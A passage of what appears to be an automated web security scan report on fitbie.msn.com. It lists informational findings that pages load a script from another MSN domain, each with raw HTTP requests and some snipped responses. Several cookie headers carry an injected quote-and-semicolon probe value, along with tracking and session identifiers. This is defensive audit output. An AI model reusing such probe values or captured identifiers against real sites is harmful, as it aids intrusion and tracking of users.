Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.19. http://fitbie.msn.com/look-better-naked-2-day-cleanse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/look-better-naked-2-day-cleanse

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /look-better-naked-2-day-cleanse HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.20. http://fitbie.msn.com/lose-weight previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/lose-weight

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /lose-weight HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 13:36:26 +0000
ETag: "1297604186-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=40374
Expires: Mon, 14 Feb 2011 01:36:26 GMT
Date: Sun, 13 Feb 2011 14:23:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 103005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.21. http://fitbie.msn.com/lose-weight/after previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/lose-weight/after

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /lose-weight/after HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:25:30 +0000
ETag: "1297607130-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=43190
Expires: Mon, 14 Feb 2011 02:25:21 GMT
Date: Sun, 13 Feb 2011 14:25:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 109337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.22. http://fitbie.msn.com/lose-weight/fat-burning-workouts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/lose-weight/fat-burning-workouts

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /lose-weight/fat-burning-workouts HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:02:03 +0000
ETag: "1297605723-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=41806
Expires: Mon, 14 Feb 2011 02:02:04 GMT
Date: Sun, 13 Feb 2011 14:25:18 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 100909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.23. http://fitbie.msn.com/meal-plan/lose-weight-400-calorie-meals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/meal-plan/lose-weight-400-calorie-meals

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /meal-plan/lose-weight-400-calorie-meals HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.24. http://fitbie.msn.com/men/toughness-challenge previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/men/toughness-challenge

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /men/toughness-challenge HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.25. http://fitbie.msn.com/node/4411 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/node/4411

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /node/4411 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.26. http://fitbie.msn.com/slideshow/10-grab-and-go-fitness-foods previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/slideshow/10-grab-and-go-fitness-foods

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /slideshow/10-grab-and-go-fitness-foods HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.27. http://fitbie.msn.com/slideshow/11-reasons-spring-should-come-sooner previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/slideshow/11-reasons-spring-should-come-sooner

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /slideshow/11-reasons-spring-should-come-sooner HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.28. http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/slideshow/12-ways-make-water-less-boring

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /slideshow/12-ways-make-water-less-boring HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Fri, 11 Feb 2011 18:12:01 +0000
ETag: "1297447921-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=32554
Expires: Sat, 12 Feb 2011 06:12:01 GMT
Date: Fri, 11 Feb 2011 21:09:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.29. http://fitbie.msn.com/slideshow/30-second-weight-loss-tricks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/slideshow/30-second-weight-loss-tricks

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /slideshow/30-second-weight-loss-tricks HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
